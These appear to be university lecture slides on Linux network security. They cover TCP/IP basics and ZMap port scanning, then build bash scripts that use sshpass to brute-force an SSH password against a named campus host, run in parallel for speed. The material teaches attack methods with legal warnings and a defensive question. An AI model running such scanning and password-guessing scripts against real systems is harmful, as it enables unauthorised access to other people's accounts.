Network Security In Linux:
Scanning and Hacking
Review
• Lex
– A lexical analyzer that tokenizes an input text.
• Yacc
– A parser that parses and acts based on defined grammar rules involving tokens.
• How to compile Lex and Yacc source files into
an executable file.
Outline
• A naïve way to hack
– Background
• IP network • TCP protocols
– Network scanning
Background
• Internet:
– A set of inter-connected networks – Largely rely on the TCP/IP protocol
• IP : Internet Protocol
– Provide an address for information routing – Data is segmented into packets.
• TCP : Transmission Control Protocol
– Over IP, control how to transmit IP packets, – Port numbers: differentiate services.
IP
• Responsible for end to end transmission
• Sends data in individual packets
• Maximum size of packet is determined by the
networks
– Fragmented if too large
• Unreliable
– Packets might be lost, corrupted, duplicated, delivered out of order
IP address
• IP address: 4 bytes
– e.g. 141.225.9.148 (csa.memphis.edu) – Each device normally gets one
– In theory there are about 4 billion available
• A subnet:
4 bytes IP
/
[0~32]
– Represent a range of IP addresses – e.g.,
• 141.225.8.1/22
TCP port number
• A port number is an
application-specific
software construct serving as a
communications endpoint in a computer's host
operating system.
– 2 Bytes: 0 ~ 65535
– Used to differentiate services.
• Examples:
– 21 – FTP, 22 – SSH, 23 – Telnet, – 80 – HTTP, 443 – HTTPS
How to connect to a machine
• You got an IP address, you know what you
want
– Surfing web send packets with the destination IP and port number 80
– SSH login send packets with the destination IP and port number 22
– …
Potential Risks
• As long as your machine has an IP and connect
to the Internet, everyone can try to log in to
your machine.
– FTP login – SSH login – Telnet login – PHP login – MySQL login – …How to SSH log in to a machine
• Steps:
– You need to know a machine has SSH service. – You need a username and a password,
– Then, connect to the destination IP on port 22.
• Example:
– ssh [email protected]
– The computer will create a packet consisting of
• The IP of csa.memphis.edu: 141.225.9.148 • The port number of SSH: 22
Check if a machine supports SSH
• Port scanning
– Scan a subnet or the whole Internet to see which machines support SSH login.
• Implementation:
– Send a login packet to an IP with port 22, test if there is a response.
Scanning Tool in Linux
• ZMap
– A very recent tool. – https://zmap.io/
– Released in 2013.
• Installation:
– Download the source, compile and install.
• https://github.com/zmap/zmap
– Ubuntu/Mint:
ZMap Feature
• Fast
– can port scan the entire IPv4 address space from just one machine in under 1 hour.
Speed of ZMap vs Nmap
Averages for scanning 1 million random hosts
Internet wide results by ZMap (I)
• Find vulnerabilities
– uPnP vulnerability disclosed by HD Moore, Jan 29 2013.
– Scan results in Feb:
• 15.7 million publicly accessible UPnP devices • 3.4 million still vulnerable. ( ~22% )
Internet wide results by ZMap (2)
• Find service availability
– Outages during Hurricane Sandy, Oct-Nov 2012 – More than 30% decrease
Is port scan legal?
• DoS attacks
– Definitely break the law
• Hacking into someone’s computer
– Definitely break the law
• Port scan
– Gray area?
– most likely prohibited by ISP.
Response results to ZMap scan
• 200 Internet-wide scans
• Got response to exclude 3,753,899 addresses
– (~0.11% of the IP address space)
ZMap for our use
• zmap –p
[port] [IP]
/
[mask]
–i
[device]
–o
[file]
– -p: specify a port number
– -i: can be omitted if you have just one network device
– -o: output all found IPs into a file
• Example:
– zmap –p 22 141.225.8.1/22 –i eth1 – zmap –p 22 141.225.9.1/24 –i eth1
Exercise: do a port scan
• Scan subnet 141.225.8.1/22 with
– port 80. – port 22.
Mission
• Suppose Tom has an account
– At a remote host: csa.memphis.edu – Username: tom
– Passwords: don’t know, but all numbers.
How to guess a password
• Create a dictionary
– try all passwords in the dictionary one by one
• How to create a dictionary:
– Non-trivial
– Social engineering
• What’s the user’s name? • What’s the user’s birthday? • What’s the user’s nickname? • ….
Guidelines to create a dictionary
• Some common things about our passwords
– People tend to write letters first, then numbers – People tend to write special characters last.
• !, *, @, #, $, %
– People tend to use birthday, phone numbers, street numbers, zip code, …
– Some people tend to use only numbers. – Many people don’t like uppercase, or put
uppercase first. – … …
A password with only numbers
• DON’T use password that contains only
numbers!
• Create a dictionary that contains all
combinations of numbers.
– Try them one by one.
#dict.txt
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 …
Try password
• We can manually try passwords in the
dictionary one by one.
• Or, we can write a shell script to try all
passwords.
#dict.txt 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 … tom csa.memphis.edu ssh port 22sshpass
• Command ssh does not support automatic
password entering:
– ssh [email protected]
– You always need to enter the password manually.
• sshpass: support enter password in command
line.
– Ubuntu/Mint install: apt-get install sshpass – Usage:
sshpass example
• sshpass -p "12812" ssh [email protected]
– If success, it will log in.
– Otherwise, it will say “Permission denied, please try again”.
• Try more:
– sshpass -p "11111" ssh [email protected]
Write a shell script trypassword
• The arguments of the script are
– First: IP
– Second: username – Third: password – Example:
• ./trypassword csa.memphis.edu tom 1
trypassword script
#!/bin/bash# $1 - ip address to hack # $2 - username
# $3 - password
sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then
echo "Find the password: $3" exit 0
fi
exit 1
/dev/null is a device file that discard all data written to it
http://en.wikipedia.org/wiki/Null_device
Any issue?
The correct script
#!/bin/bash# $1 - ip address to hack # $2 - username
# $3 - password
echo “exit” | sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then
echo "Find the password: $3" exit 0
fi
Put trypassword in a loop
• trypassword offers one try.
• Our objective
– Try every password in the dictionary – Put trypassword in a loop.
• Each time, we try one different password • Until we find the correct password.
runhacking script
#!/bin/baship=csa.memphis.edu username=tom
dict=dict.txt
for password in `cat $dict`; do
echo "Try password: $password"
./trypassword $ip $username $password if [ $? -eq 0 ]; then
exit 0 fi
done
Speed up the process
#!/bin/baship=csa.memphis.edu username=tom
dict=dict.txt
for password in `cat $dict`; do
echo "Try password: $password"
./trypassword $ip $username $password
if [ $? -eq 0 ]; then exit 0
fi done exit 1
It will hang there and wait for the result!
Our current strategy
time
time
hacker
server
...
A better strategy
time
time
hacker
server
...
The new runhacking script
#!/bin/baship=csa.memphis.edu username=tom
dict=dict.txt
for password in `cat $dict`; do
echo "Try password: $password"
./trypassword $ip $username $password &
if [ $? -eq 0 ]; then exit 0
fi done exit 1
& is to make the command run in background (a process will be created to run the command) $? is always 0,
How to track status
runhacking ./trypassword ./trypassword ./trypassword ./trypassword … …How can we know a particular process finds the password in the runhacking script?
If find password, create a file
#!/bin/bash # trypassword script: # $1 - ip address to hack # $2 - username # $3 - password# $4 - the filename to save the found password
echo "exit" | sshpass -p "$3" ssh $2@$1 &> /dev/null if [ $? -eq 0 ]; then
echo "Find the password: $3"
echo $3 > $4
exit 0 fi
The final runhacking script
#!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt pwfile=password rm -f $pwfilefor password in `cat $dict`; do
echo "Try password: $password"
./trypassword $ip $username $password $pwfile & # If the password file is created, we find it and exit
if [ -f $pwfile ]; then exit 0
fi done
Discussions
• Hacking is ILLEGAL !
– Running this script to connect to other’s computer is illegal!
• The other’s computer can have your IP record, then trace you back.
– You can try the script on csa.memphis.edu
Summary
• TCP/IP networks
– IP address and TCP port
• ZMap
– Very fast Internet scanner
• A naïve script to try passwords
– Hacking is ILLEGAL ! – How to defend?
